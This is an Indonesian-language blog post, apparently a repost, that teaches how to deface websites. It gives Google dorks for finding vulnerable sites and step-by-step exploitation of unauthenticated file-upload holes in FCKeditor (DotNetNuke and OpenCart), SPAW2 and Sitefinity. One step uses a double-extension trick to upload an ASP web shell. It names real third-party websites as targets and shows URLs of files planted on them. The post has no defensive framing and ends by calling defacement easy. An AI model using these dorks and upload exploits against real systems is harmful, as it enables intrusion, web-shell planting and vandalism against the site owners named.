1. Defacing ASPX
Langsung buka omm google, masukkan dork inurl:Fck/fcklinkgallery.aspx atau /portals/0/inurl:tabid/176/Default.aspx. Lalu saya ambil salah satu contoh web yg vuln http://www.primeplasticsinc.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan akan tampil halaman seperti ini. Link type nya kita ubah ke file (a file in your site).
Lalu ubah URL nya menjadi javascript:__doPostBack(‘ctlURL$cmdUpload’,” ). Maka tampil command choose file, lalu masukkan file anda dan upload.
Note: ekstensi file yang dapat di upload
yaitu ( *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc,
*.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip )
Untuk melihat hasilnya maka tambahkan public_html/portals/0/file_kamu. Maka akan seperti ini http://www.primeplasticsinc.net/portals/0/hack.txt tidak sulit kan ?? 
2. Defacing OpenCart
Buka google, masukkan dork Powered By OpenCart site:.com atau SUPPORT BY OPENCART
Saya mendapatkan target www.centaurguitar.com/storefront2/ lalu kita masukkan exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html. Jadi alamatnya akan seperti ini www.centaurguitar.com/storefront2/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html dan akan muncul halaman website seperti ini
Ok langsung saja upload file kita, jika
berhasil maka akan muncul message box “File uploaded with no errors” dan
hasilnya seperti ini http://www.centaurguitar.com/hacked.html
3. Defacing SPAW
Buka google, masukkan dork nya inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/
Contoh targetnya seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php lalu perhatikan gambar ini
URL yang saya blog hapus dan diganti spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2
&lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9
Maka akan alamat URL nya akan seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da75%202d9%208cac9 dan muncul pilihan upload, tinggal upload saja file nya. Dan hasilnya seperti ini http://www.demariahoeve.nl/cms/spaw2/uploads/files/hacked.txt
4. Defacing Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
Dork : “Sitefinity: Login”
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx
Cari targetnya sama seperti cara diatas. Contoh targetnya http://www.hoac-bsa.org/sitefinity/ lalu masukkan exploitnya sehingga seperti ini http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
lalu sekarang kita tinggal upload sheelnya, dalam ASP.NET file yang
dapat diupload adalah JPG, contoh : (namashell.asp;.jpg) atau
(namashell.asp;.gif). Jika sudah diupload, maka cara untuk menampilkan
shell kita dengan mengklik “view original size” dan hasilnya seperti ini http://www.hoac-bsa.org/Images/hacked.asp;.jpg
Mungkin segitu aja yang bisa saya share, jadi kesimpulannya deface itu mudah bukan??sumber : http://adhie70.wordpress.com/
Tidak ada komentar:
Posting Komentar
Diharapkan dapat memberikan komentar yang membangun
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.